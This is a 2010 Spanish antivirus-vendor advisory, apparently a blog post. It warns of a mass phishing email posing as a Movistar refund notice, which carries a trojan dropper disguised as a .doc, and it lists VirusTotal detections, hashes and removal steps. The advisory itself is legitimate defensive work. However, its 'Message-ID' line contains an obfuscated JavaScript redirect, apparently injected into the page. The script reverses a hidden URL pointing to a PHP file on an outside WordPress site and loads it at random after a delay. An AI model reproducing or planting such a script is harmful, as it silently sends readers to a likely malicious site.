NUEVO MAIL MASIVO con malware incluido, esta vez aparentando venir de Movistar ( Telefonica)

Se están recibiendo masivamente mails con estas caracteristicas:

______________

Message-ID:  <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:movistar@movistar.es”>movistar@movistar.es>
To:  <destinatario>
Subject:  Devolucion de facturas Movistar!
Date:  Fri, 18 Jun 2010 13:39:17 +0200
MIME-Version:  1.0
Content-Type:  multipart/mixed; boundary=”———-DC1341AE1AAEEBD5″
X-UIDL:  /C7!!,e`!!0oi”!Zld!!

Dereccion de Servicios Comerciales
N de Reclamacion: 5809426313

Estimado Cliente!

        Me dirijo a Vd. en contestacion a la reclamacion que nos
ha formulado sobre el importe de las facturas que se relacionan en el pie,
para confirmarle de que se va a proceder a la devolucion,
mediante transferencia bancaria a su cuenta, la cantidad de
42,18    euros,  mas el
IVA correspondiente, segun  se muestra  en la factura que le adjunto.

ANEXO:

Devolucion85.zip  0 k   [ application/x-zip-compressed ]    Descargar

_______________

y anexa un fichero Devolucion85.doc._____…______.exe, del que es visible como maximo la extension .DOC, y el correspondiente icono falseado, claro !

 IMAGEN ICONO FICHERO

Dicho fichero anexado es detectado por muy pocos antivirus, segun pues verse en el analisis de VirusTotal:
File Devolucion85.doc_________________ received on 2010.06.18 08:35:31 (UTC)

Result: 7/40 (17.5%)

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.18 –
AhnLab-V3 2010.06.18.01 2010.06.18 –
AntiVir 8.2.2.6 2010.06.18 –
Antiy-AVL 2.0.3.7 2010.06.17 –
Authentium 5.2.0.5 2010.06.18 –
Avast 4.8.1351.0 2010.06.18 –
Avast5 5.0.332.0 2010.06.18 –
AVG 9.0.0.787 2010.06.17 –
BitDefender 7.2 2010.06.18 Trojan.Dropper.Oficla.V
CAT-QuickHeal 10.00 2010.06.18 –
ClamAV 0.96.0.3-git 2010.06.18 –
Comodo 5139 2010.06.18 –
DrWeb 5.0.2.03300 2010.06.18 –
eSafe 7.0.17.0 2010.06.17 –
eTrust-Vet 36.1.7646 2010.06.18 –
F-Prot 4.6.1.107 2010.06.17 –
F-Secure 9.0.15370.0 2010.06.18 Trojan-Dropper:W32/Oficla.FG
Fortinet 4.1.133.0 2010.06.17 –
GData 21 2010.06.18 Trojan.Dropper.Oficla.V
Ikarus T3.1.1.84.0 2010.06.18 –
Jiangmin 13.0.900 2010.06.15 –
Kaspersky 7.0.0.125 2010.06.18 –
McAfee 5.400.0.1158 2010.06.18 –
McAfee-GW-Edition 2010.1 2010.06.18 Heuristic.LooksLike.Win32.SuspiciousPE.J!80
Microsoft 1.5902 2010.06.18 –
NOD32 5205 2010.06.17 –
Norman 6.05.06 2010.06.17 –
Panda 10.0.2.7 2010.06.18 Trj/Sinowal.XCC
PCTools 7.0.3.5 2010.06.18 –
Prevx 3.0 2010.06.18 –
Rising 22.52.04.04 2010.06.18 –
Sophos 4.54.0 2010.06.18 Mal/EncPk-QI
Sunbelt 6465 2010.06.18 –
Symantec 20101.1.0.89 2010.06.18 –
TheHacker 6.5.2.0.299 2010.06.17 W32/Behav-Heuristic-CorruptFile-EP
TrendMicro 9.120.0.1004 2010.06.18 –
TrendMicro-HouseCall 9.120.0.1004 2010.06.18 –
VBA32 3.12.12.5 2010.06.17 –
ViRobot 2010.6.14.3884 2010.06.18 –
VirusBuster 5.0.27.0 2010.06.17 –
Additional information
File size: 41472 bytes
MD5…: 2ba1f325cfd9f2fabf05474cf66455c4
SHA1..: 2741517b17059b923bbb9abddeef76d170bb0272

McAfee ya lo detecta, pero quien no lo use, lo puede detectar y eliminar con nuestro ELIMD5.EXE indicando cualquiera de los hashes indicados al final del informe, por ejemplo  2ba1f325cfd9f2fabf05474cf66455c4  y así se detectará y eliminará el fichero infectado.

Hoy implementaremos su control y eliminacIon como Dropper Bredavi en el ELISTARA 21.19 que estará disponible en esta web a partir de las 15 horas

saludos

ms, 18-6-2010